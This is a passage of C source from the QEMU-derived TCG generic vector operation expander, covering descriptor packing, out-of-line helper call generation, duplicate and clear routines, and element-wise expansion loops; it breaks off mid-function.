/* * Generic vector operation expansion * * Copyright (c) 2018 Linaro * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2.1 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "tcg/tcg.h" #include "tcg/tcg-op.h" #include "tcg/tcg-op-gvec.h" #include "tcg/tcg-gvec-desc.h" #define MAX_UNROLL 4 #ifdef CONFIG_DEBUG_TCG // static const TCGOpcode vecop_list_empty[1] = { 0 }; #else #define vecop_list_empty NULL #endif /* Verify vector size and alignment rules. OFS should be the OR of all of the operand offsets so that we can check them all at once. */ static void check_size_align(uint32_t oprsz, uint32_t maxsz, uint32_t ofs) { uint32_t opr_align = oprsz >= 16 ? 15 : 7; uint32_t max_align = maxsz >= 16 || oprsz >= 16 ? 
15 : 7; tcg_debug_assert(oprsz > 0); tcg_debug_assert(oprsz <= maxsz); tcg_debug_assert((oprsz & opr_align) == 0); tcg_debug_assert((maxsz & max_align) == 0); tcg_debug_assert((ofs & max_align) == 0); } /* Verify vector overlap rules for two operands. */ static void check_overlap_2(uint32_t d, uint32_t a, uint32_t s) { tcg_debug_assert(d == a || d + s <= a || a + s <= d); } /* Verify vector overlap rules for three operands. */ static void check_overlap_3(uint32_t d, uint32_t a, uint32_t b, uint32_t s) { check_overlap_2(d, a, s); check_overlap_2(d, b, s); check_overlap_2(a, b, s); } /* Verify vector overlap rules for four operands. */ static void check_overlap_4(uint32_t d, uint32_t a, uint32_t b, uint32_t c, uint32_t s) { check_overlap_2(d, a, s); check_overlap_2(d, b, s); check_overlap_2(d, c, s); check_overlap_2(a, b, s); check_overlap_2(a, c, s); check_overlap_2(b, c, s); } /* Create a descriptor from components. */ uint32_t simd_desc(uint32_t oprsz, uint32_t maxsz, int32_t data) { uint32_t desc = 0; assert(oprsz % 8 == 0 && oprsz <= (8 << SIMD_OPRSZ_BITS)); assert(maxsz % 8 == 0 && maxsz <= (8 << SIMD_MAXSZ_BITS)); assert(data == sextract32(data, 0, SIMD_DATA_BITS)); oprsz = (oprsz / 8) - 1; maxsz = (maxsz / 8) - 1; desc = deposit32(desc, SIMD_OPRSZ_SHIFT, SIMD_OPRSZ_BITS, oprsz); desc = deposit32(desc, SIMD_MAXSZ_SHIFT, SIMD_MAXSZ_BITS, maxsz); desc = deposit32(desc, SIMD_DATA_SHIFT, SIMD_DATA_BITS, data); return desc; } /* Generate a call to a gvec-style helper with two vector operands. */ void tcg_gen_gvec_2_ool(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_2 *fn) { TCGv_ptr a0, a1; TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(oprsz, maxsz, data)); a0 = tcg_temp_new_ptr(tcg_ctx); a1 = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, a1, tcg_ctx->cpu_env, aofs); fn(tcg_ctx, a0, a1, desc); tcg_temp_free_ptr(tcg_ctx, a0); tcg_temp_free_ptr(tcg_ctx, a1); tcg_temp_free_i32(tcg_ctx, desc); } /* Generate a call to a gvec-style helper with two vector operands and one scalar operand. */ void tcg_gen_gvec_2i_ool(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, TCGv_i64 c, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_2i *fn) { TCGv_ptr a0, a1; TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(oprsz, maxsz, data)); a0 = tcg_temp_new_ptr(tcg_ctx); a1 = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, a1, tcg_ctx->cpu_env, aofs); fn(tcg_ctx, a0, a1, c, desc); tcg_temp_free_ptr(tcg_ctx, a0); tcg_temp_free_ptr(tcg_ctx, a1); tcg_temp_free_i32(tcg_ctx, desc); } /* Generate a call to a gvec-style helper with three vector operands. */ void tcg_gen_gvec_3_ool(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_3 *fn) { TCGv_ptr a0, a1, a2; TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(oprsz, maxsz, data)); a0 = tcg_temp_new_ptr(tcg_ctx); a1 = tcg_temp_new_ptr(tcg_ctx); a2 = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, a1, tcg_ctx->cpu_env, aofs); tcg_gen_addi_ptr(tcg_ctx, a2, tcg_ctx->cpu_env, bofs); fn(tcg_ctx, a0, a1, a2, desc); tcg_temp_free_ptr(tcg_ctx, a0); tcg_temp_free_ptr(tcg_ctx, a1); tcg_temp_free_ptr(tcg_ctx, a2); tcg_temp_free_i32(tcg_ctx, desc); } /* Generate a call to a gvec-style helper with four vector operands. 
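All of these _ool ("out of line") expanders share one shape: materialize env-relative pointers to each vector slice, pack oprsz, maxsz and data into a simd_desc() word, and emit a single call to the helper, which loops over the lanes at run time. For illustration only (the name is hypothetical), a matching four-operand helper body has the C shape "void helper_foo(void *d, void *a, void *b, void *c, uint32_t desc)", with the lane count recovered via simd_oprsz(desc).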
*/ void tcg_gen_gvec_4_ool(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_4 *fn) { TCGv_ptr a0, a1, a2, a3; TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(oprsz, maxsz, data)); a0 = tcg_temp_new_ptr(tcg_ctx); a1 = tcg_temp_new_ptr(tcg_ctx); a2 = tcg_temp_new_ptr(tcg_ctx); a3 = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, a1, tcg_ctx->cpu_env, aofs); tcg_gen_addi_ptr(tcg_ctx, a2, tcg_ctx->cpu_env, bofs); tcg_gen_addi_ptr(tcg_ctx, a3, tcg_ctx->cpu_env, cofs); fn(tcg_ctx, a0, a1, a2, a3, desc); tcg_temp_free_ptr(tcg_ctx, a0); tcg_temp_free_ptr(tcg_ctx, a1); tcg_temp_free_ptr(tcg_ctx, a2); tcg_temp_free_ptr(tcg_ctx, a3); tcg_temp_free_i32(tcg_ctx, desc); } /* Generate a call to a gvec-style helper with five vector operands. */ void tcg_gen_gvec_5_ool(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t xofs, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_5 *fn) { TCGv_ptr a0, a1, a2, a3, a4; TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(oprsz, maxsz, data)); a0 = tcg_temp_new_ptr(tcg_ctx); a1 = tcg_temp_new_ptr(tcg_ctx); a2 = tcg_temp_new_ptr(tcg_ctx); a3 = tcg_temp_new_ptr(tcg_ctx); a4 = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, a1, tcg_ctx->cpu_env, aofs); tcg_gen_addi_ptr(tcg_ctx, a2, tcg_ctx->cpu_env, bofs); tcg_gen_addi_ptr(tcg_ctx, a3, tcg_ctx->cpu_env, cofs); tcg_gen_addi_ptr(tcg_ctx, a4, tcg_ctx->cpu_env, xofs); fn(tcg_ctx, a0, a1, a2, a3, a4, desc); tcg_temp_free_ptr(tcg_ctx, a0); tcg_temp_free_ptr(tcg_ctx, a1); tcg_temp_free_ptr(tcg_ctx, a2); tcg_temp_free_ptr(tcg_ctx, a3); tcg_temp_free_ptr(tcg_ctx, a4); tcg_temp_free_i32(tcg_ctx, desc); } /* Generate a call to a gvec-style helper with two vector operands and an extra pointer operand. */ void tcg_gen_gvec_2_ptr(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, TCGv_ptr ptr, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_2_ptr *fn) { TCGv_ptr a0, a1; TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(oprsz, maxsz, data)); a0 = tcg_temp_new_ptr(tcg_ctx); a1 = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, a1, tcg_ctx->cpu_env, aofs); fn(tcg_ctx, a0, a1, ptr, desc); tcg_temp_free_ptr(tcg_ctx, a0); tcg_temp_free_ptr(tcg_ctx, a1); tcg_temp_free_i32(tcg_ctx, desc); } /* Generate a call to a gvec-style helper with three vector operands and an extra pointer operand. */ void tcg_gen_gvec_3_ptr(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, TCGv_ptr ptr, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_3_ptr *fn) { TCGv_ptr a0, a1, a2; TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(oprsz, maxsz, data)); a0 = tcg_temp_new_ptr(tcg_ctx); a1 = tcg_temp_new_ptr(tcg_ctx); a2 = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, a1, tcg_ctx->cpu_env, aofs); tcg_gen_addi_ptr(tcg_ctx, a2, tcg_ctx->cpu_env, bofs); fn(tcg_ctx, a0, a1, a2, ptr, desc); tcg_temp_free_ptr(tcg_ctx, a0); tcg_temp_free_ptr(tcg_ctx, a1); tcg_temp_free_ptr(tcg_ctx, a2); tcg_temp_free_i32(tcg_ctx, desc); } /* Generate a call to a gvec-style helper with four vector operands and an extra pointer operand. 
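The extra TCGv_ptr argument is a runtime value forwarded to the helper as-is, typically cpu_env or a float-status pointer that the helper needs in addition to the raw vector slices.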
*/ void tcg_gen_gvec_4_ptr(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, TCGv_ptr ptr, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_4_ptr *fn) { TCGv_ptr a0, a1, a2, a3; TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(oprsz, maxsz, data)); a0 = tcg_temp_new_ptr(tcg_ctx); a1 = tcg_temp_new_ptr(tcg_ctx); a2 = tcg_temp_new_ptr(tcg_ctx); a3 = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, a1, tcg_ctx->cpu_env, aofs); tcg_gen_addi_ptr(tcg_ctx, a2, tcg_ctx->cpu_env, bofs); tcg_gen_addi_ptr(tcg_ctx, a3, tcg_ctx->cpu_env, cofs); fn(tcg_ctx, a0, a1, a2, a3, ptr, desc); tcg_temp_free_ptr(tcg_ctx, a0); tcg_temp_free_ptr(tcg_ctx, a1); tcg_temp_free_ptr(tcg_ctx, a2); tcg_temp_free_ptr(tcg_ctx, a3); tcg_temp_free_i32(tcg_ctx, desc); } /* Generate a call to a gvec-style helper with five vector operands and an extra pointer operand. */ void tcg_gen_gvec_5_ptr(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t eofs, TCGv_ptr ptr, uint32_t oprsz, uint32_t maxsz, int32_t data, gen_helper_gvec_5_ptr *fn) { TCGv_ptr a0, a1, a2, a3, a4; TCGv_i32 desc = tcg_const_i32(tcg_ctx, simd_desc(oprsz, maxsz, data)); a0 = tcg_temp_new_ptr(tcg_ctx); a1 = tcg_temp_new_ptr(tcg_ctx); a2 = tcg_temp_new_ptr(tcg_ctx); a3 = tcg_temp_new_ptr(tcg_ctx); a4 = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, a0, tcg_ctx->cpu_env, dofs); tcg_gen_addi_ptr(tcg_ctx, a1, tcg_ctx->cpu_env, aofs); tcg_gen_addi_ptr(tcg_ctx, a2, tcg_ctx->cpu_env, bofs); tcg_gen_addi_ptr(tcg_ctx, a3, tcg_ctx->cpu_env, cofs); tcg_gen_addi_ptr(tcg_ctx, a4, tcg_ctx->cpu_env, eofs); fn(tcg_ctx, a0, a1, a2, a3, a4, ptr, desc); tcg_temp_free_ptr(tcg_ctx, a0); tcg_temp_free_ptr(tcg_ctx, a1); tcg_temp_free_ptr(tcg_ctx, a2); tcg_temp_free_ptr(tcg_ctx, a3); tcg_temp_free_ptr(tcg_ctx, a4); tcg_temp_free_i32(tcg_ctx, desc); } /* Return true if we want to implement something of OPRSZ bytes in units of LNSZ. This limits the expansion of inline code. */ static inline bool check_size_impl(uint32_t oprsz, uint32_t lnsz) { if (oprsz % lnsz == 0) { uint32_t lnct = oprsz / lnsz; return lnct >= 1 && lnct <= MAX_UNROLL; } return false; } static void expand_clr(TCGContext *tcg_ctx, uint32_t dofs, uint32_t maxsz); /* Duplicate C as per VECE. */ uint64_t dup_const_func(unsigned vece, uint64_t c) { switch (vece) { case MO_8: return 0x0101010101010101ull * (uint8_t)c; case MO_16: return 0x0001000100010001ull * (uint16_t)c; case MO_32: return 0x0000000100000001ull * (uint32_t)c; case MO_64: return c; default: // g_assert_not_reached(); return 0; } } /* Duplicate IN into OUT as per VECE. 
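Worked example: for vece == MO_8 and in == 0xAB, ext8u leaves 0x000000AB and the multiply by 0x01010101 smears it to 0xABABABAB; the MO_16 case instead deposits the low 16 bits into bits [31:16].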
*/ static void gen_dup_i32(TCGContext *tcg_ctx, unsigned vece, TCGv_i32 out, TCGv_i32 in) { switch (vece) { case MO_8: tcg_gen_ext8u_i32(tcg_ctx, out, in); tcg_gen_muli_i32(tcg_ctx, out, out, 0x01010101); break; case MO_16: tcg_gen_deposit_i32(tcg_ctx, out, in, in, 16, 16); break; case MO_32: tcg_gen_mov_i32(tcg_ctx, out, in); break; default: // g_assert_not_reached(); break; } } static void gen_dup_i64(TCGContext *tcg_ctx, unsigned vece, TCGv_i64 out, TCGv_i64 in) { switch (vece) { case MO_8: tcg_gen_ext8u_i64(tcg_ctx, out, in); tcg_gen_muli_i64(tcg_ctx, out, out, 0x0101010101010101ull); break; case MO_16: tcg_gen_ext16u_i64(tcg_ctx, out, in); tcg_gen_muli_i64(tcg_ctx, out, out, 0x0001000100010001ull); break; case MO_32: tcg_gen_deposit_i64(tcg_ctx, out, in, in, 32, 32); break; case MO_64: tcg_gen_mov_i64(tcg_ctx, out, in); break; default: // g_assert_not_reached(); break; } } /* Select a supported vector type for implementing an operation on SIZE * bytes. If OP is 0, assume that the real operation to be performed is * required by all backends. Otherwise, make sure that OP can be performed * on elements of size VECE in the selected type. Do not select V64 if * PREFER_I64 is true. Return 0 if no vector type is selected. */ static TCGType choose_vector_type(TCGContext *tcg_ctx, const TCGOpcode *list, unsigned vece, uint32_t size, bool prefer_i64) { if (TCG_TARGET_HAS_v256 && check_size_impl(size, 32)) { /* * Recall that ARM SVE allows vector sizes that are not a * power of 2, but always a multiple of 16. The intent is * that e.g. size == 80 would be expanded with 2x32 + 1x16. * It is hard to imagine a case in which v256 is supported * but v128 is not, but check anyway. */ if (tcg_can_emit_vecop_list(tcg_ctx, list, TCG_TYPE_V256, vece) && (size % 32 == 0 || tcg_can_emit_vecop_list(tcg_ctx, list, TCG_TYPE_V128, vece))) { return TCG_TYPE_V256; } } if (TCG_TARGET_HAS_v128 && check_size_impl(size, 16) && tcg_can_emit_vecop_list(tcg_ctx, list, TCG_TYPE_V128, vece)) { return TCG_TYPE_V128; } if (TCG_TARGET_HAS_v64 && !prefer_i64 && check_size_impl(size, 8) && tcg_can_emit_vecop_list(tcg_ctx, list, TCG_TYPE_V64, vece)) { return TCG_TYPE_V64; } return 0; } static void do_dup_store(TCGContext *tcg_ctx, TCGType type, uint32_t dofs, uint32_t oprsz, uint32_t maxsz, TCGv_vec t_vec) { uint32_t i = 0; switch (type) { case TCG_TYPE_V256: /* * Recall that ARM SVE allows vector sizes that are not a * power of 2, but always a multiple of 16. The intent is * that e.g. size == 80 would be expanded with 2x32 + 1x16. */ for (; i + 32 <= oprsz; i += 32) { tcg_gen_stl_vec(tcg_ctx, t_vec, tcg_ctx->cpu_env, dofs + i, TCG_TYPE_V256); } /* fallthru */ case TCG_TYPE_V128: for (; i + 16 <= oprsz; i += 16) { tcg_gen_stl_vec(tcg_ctx, t_vec, tcg_ctx->cpu_env, dofs + i, TCG_TYPE_V128); } break; case TCG_TYPE_V64: for (; i < oprsz; i += 8) { tcg_gen_stl_vec(tcg_ctx, t_vec, tcg_ctx->cpu_env, dofs + i, TCG_TYPE_V64); } break; default: g_assert_not_reached(); } if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } /* Set OPRSZ bytes at DOFS to replications of IN_32, IN_64 or IN_C. * Only one of IN_32 or IN_64 may be set; * IN_C is used if IN_32 and IN_64 are unset. */ static void do_dup(TCGContext *tcg_ctx, unsigned vece, uint32_t dofs, uint32_t oprsz, uint32_t maxsz, TCGv_i32 in_32, TCGv_i64 in_64, uint64_t in_c) { TCGType type; TCGv_i64 t_64; TCGv_i32 t_32, t_desc; TCGv_ptr t_ptr; uint32_t i; assert(vece <= (in_32 ? 
MO_32 : MO_64)); assert(in_32 == NULL || in_64 == NULL); /* If we're storing 0, expand oprsz to maxsz. */ if (in_32 == NULL && in_64 == NULL) { in_c = dup_const(vece, in_c); if (in_c == 0) { oprsz = maxsz; } } /* Implement inline with a vector type, if possible. * Prefer integer when 64-bit host and no variable dup. */ type = choose_vector_type(tcg_ctx, NULL, vece, oprsz, (TCG_TARGET_REG_BITS == 64 && in_32 == NULL && (in_64 == NULL || vece == MO_64))); if (type != 0) { TCGv_vec t_vec = tcg_temp_new_vec(tcg_ctx, type); if (in_32) { tcg_gen_dup_i32_vec(tcg_ctx, vece, t_vec, in_32); } else if (in_64) { tcg_gen_dup_i64_vec(tcg_ctx, vece, t_vec, in_64); } else { tcg_gen_dupi_vec(tcg_ctx, vece, t_vec, in_c); } do_dup_store(tcg_ctx, type, dofs, oprsz, maxsz, t_vec); tcg_temp_free_vec(tcg_ctx, t_vec); return; } /* Otherwise, inline with an integer type, unless "large". */ if (check_size_impl(oprsz, TCG_TARGET_REG_BITS / 8)) { t_64 = NULL; t_32 = NULL; if (in_32) { /* We are given a 32-bit variable input. For a 64-bit host, use a 64-bit operation unless the 32-bit operation would be simple enough. */ if (TCG_TARGET_REG_BITS == 64 && (vece != MO_32 || !check_size_impl(oprsz, 4))) { t_64 = tcg_temp_new_i64(tcg_ctx); tcg_gen_extu_i32_i64(tcg_ctx, t_64, in_32); gen_dup_i64(tcg_ctx, vece, t_64, t_64); } else { t_32 = tcg_temp_new_i32(tcg_ctx); gen_dup_i32(tcg_ctx, vece, t_32, in_32); } } else if (in_64) { /* We are given a 64-bit variable input. */ t_64 = tcg_temp_new_i64(tcg_ctx); gen_dup_i64(tcg_ctx, vece, t_64, in_64); } else { /* We are given a constant input. */ /* For 64-bit hosts, use 64-bit constants for "simple" constants or when we'd need too many 32-bit stores, or when a 64-bit constant is really required. */ if (vece == MO_64 || (TCG_TARGET_REG_BITS == 64 && (in_c == 0 || in_c == -1 || !check_size_impl(oprsz, 4)))) { t_64 = tcg_const_i64(tcg_ctx, in_c); } else { t_32 = tcg_const_i32(tcg_ctx, in_c); } } /* Implement inline if we picked an implementation size above. */ if (t_32) { for (i = 0; i < oprsz; i += 4) { tcg_gen_st_i32(tcg_ctx, t_32, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i32(tcg_ctx, t_32); goto done; } if (t_64) { for (i = 0; i < oprsz; i += 8) { tcg_gen_st_i64(tcg_ctx, t_64, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i64(tcg_ctx, t_64); goto done; } } /* Otherwise implement out of line. */ t_ptr = tcg_temp_new_ptr(tcg_ctx); tcg_gen_addi_ptr(tcg_ctx, t_ptr, tcg_ctx->cpu_env, dofs); t_desc = tcg_const_i32(tcg_ctx, simd_desc(oprsz, maxsz, 0)); if (vece == MO_64) { if (in_64) { gen_helper_gvec_dup64(tcg_ctx, t_ptr, t_desc, in_64); } else { t_64 = tcg_const_i64(tcg_ctx, in_c); gen_helper_gvec_dup64(tcg_ctx, t_ptr, t_desc, t_64); tcg_temp_free_i64(tcg_ctx, t_64); } } else { typedef void dup_fn(TCGContext *, TCGv_ptr, TCGv_i32, TCGv_i32); static dup_fn * const fns[3] = { gen_helper_gvec_dup8, gen_helper_gvec_dup16, gen_helper_gvec_dup32 }; if (in_32) { fns[vece](tcg_ctx, t_ptr, t_desc, in_32); } else { t_32 = tcg_temp_new_i32(tcg_ctx); if (in_64) { tcg_gen_extrl_i64_i32(tcg_ctx, t_32, in_64); } else if (vece == MO_8) { tcg_gen_movi_i32(tcg_ctx, t_32, in_c & 0xff); } else if (vece == MO_16) { tcg_gen_movi_i32(tcg_ctx, t_32, in_c & 0xffff); } else { tcg_gen_movi_i32(tcg_ctx, t_32, in_c); } fns[vece](tcg_ctx, t_ptr, t_desc, t_32); tcg_temp_free_i32(tcg_ctx, t_32); } } tcg_temp_free_ptr(tcg_ctx, t_ptr); tcg_temp_free_i32(tcg_ctx, t_desc); return; done: if (oprsz < maxsz) { expand_clr(tcg_ctx, dofs + oprsz, maxsz - oprsz); } } /* Likewise, but with zero. 
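That is, clearing is just do_dup of the constant zero at MO_8, stored across the full maxsz region.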
*/ static void expand_clr(TCGContext *tcg_ctx, uint32_t dofs, uint32_t maxsz) { do_dup(tcg_ctx, MO_8, dofs, maxsz, maxsz, NULL, NULL, 0); } /* Expand OPSZ bytes worth of two-operand operations using i32 elements. */ static void expand_2_i32(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, void (*fni)(TCGContext *, TCGv_i32, TCGv_i32)) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 4) { tcg_gen_ld_i32(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); fni(tcg_ctx, t0, t0); tcg_gen_st_i32(tcg_ctx, t0, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i32(tcg_ctx, t0); } static void expand_2i_i32(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, int32_t c, bool load_dest, void (*fni)(TCGContext *, TCGv_i32, TCGv_i32, int32_t)) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 4) { tcg_gen_ld_i32(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); if (load_dest) { tcg_gen_ld_i32(tcg_ctx, t1, tcg_ctx->cpu_env, dofs + i); } fni(tcg_ctx, t1, t0, c); tcg_gen_st_i32(tcg_ctx, t1, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } static void expand_2s_i32(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, TCGv_i32 c, bool scalar_first, void (*fni)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32)) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 4) { tcg_gen_ld_i32(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); if (scalar_first) { fni(tcg_ctx, t1, c, t0); } else { fni(tcg_ctx, t1, t0, c); } tcg_gen_st_i32(tcg_ctx, t1, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); } /* Expand OPSZ bytes worth of three-operand operations using i32 elements. */ static void expand_3_i32(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, bool load_dest, void (*fni)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32)) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 4) { tcg_gen_ld_i32(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); tcg_gen_ld_i32(tcg_ctx, t1, tcg_ctx->cpu_env, bofs + i); if (load_dest) { tcg_gen_ld_i32(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i); } fni(tcg_ctx, t2, t0, t1); tcg_gen_st_i32(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t0); } static void expand_3i_i32(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t oprsz, int32_t c, bool load_dest, void (*fni)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32, int32_t)) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 4) { tcg_gen_ld_i32(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); tcg_gen_ld_i32(tcg_ctx, t1, tcg_ctx->cpu_env, bofs + i); if (load_dest) { tcg_gen_ld_i32(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i); } fni(tcg_ctx, t2, t0, t1, c); tcg_gen_st_i32(tcg_ctx, t2, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i32(tcg_ctx, t0); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t2); } /* Expand OPSZ bytes worth of four-operand operations using i32 elements. 
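(The four operands are dofs, aofs, bofs and cofs; when write_aofs is set, the value read from aofs is stored back after fni runs, so operations that also update a source can be expressed.)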
*/ static void expand_4_i32(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t bofs, uint32_t cofs, uint32_t oprsz, bool write_aofs, void (*fni)(TCGContext *, TCGv_i32, TCGv_i32, TCGv_i32, TCGv_i32)) { TCGv_i32 t0 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t1 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t2 = tcg_temp_new_i32(tcg_ctx); TCGv_i32 t3 = tcg_temp_new_i32(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 4) { tcg_gen_ld_i32(tcg_ctx, t1, tcg_ctx->cpu_env, aofs + i); tcg_gen_ld_i32(tcg_ctx, t2, tcg_ctx->cpu_env, bofs + i); tcg_gen_ld_i32(tcg_ctx, t3, tcg_ctx->cpu_env, cofs + i); fni(tcg_ctx, t0, t1, t2, t3); tcg_gen_st_i32(tcg_ctx, t0, tcg_ctx->cpu_env, dofs + i); if (write_aofs) { tcg_gen_st_i32(tcg_ctx, t1, tcg_ctx->cpu_env, aofs + i); } } tcg_temp_free_i32(tcg_ctx, t3); tcg_temp_free_i32(tcg_ctx, t2); tcg_temp_free_i32(tcg_ctx, t1); tcg_temp_free_i32(tcg_ctx, t0); } /* Expand OPSZ bytes worth of two-operand operations using i64 elements. */ static void expand_2_i64(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, void (*fni)(TCGContext *, TCGv_i64, TCGv_i64)) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 8) { tcg_gen_ld_i64(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); fni(tcg_ctx, t0, t0); tcg_gen_st_i64(tcg_ctx, t0, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i64(tcg_ctx, t0); } static void expand_2i_i64(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, int64_t c, bool load_dest, void (*fni)(TCGContext *, TCGv_i64, TCGv_i64, int64_t)) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); uint32_t i; for (i = 0; i < oprsz; i += 8) { tcg_gen_ld_i64(tcg_ctx, t0, tcg_ctx->cpu_env, aofs + i); if (load_dest) { tcg_gen_ld_i64(tcg_ctx, t1, tcg_ctx->cpu_env, dofs + i); } fni(tcg_ctx, t1, t0, c); tcg_gen_st_i64(tcg_ctx, t1, tcg_ctx->cpu_env, dofs + i); } tcg_temp_free_i64(tcg_ctx, t0); tcg_temp_free_i64(tcg_ctx, t1); } static void expand_2s_i64(TCGContext *tcg_ctx, uint32_t dofs, uint32_t aofs, uint32_t oprsz, TCGv_i64 c, bool scalar_first, void (*fni)(TCGContext *, TCGv_i64, TCGv_i64, TCGv_i64)) { TCGv_i64 t0 = tcg_temp_new_i64(tcg_ctx); TCGv_i64 t1 = tcg_temp_new_i64(tcg_ctx); uint32_t i; for (i 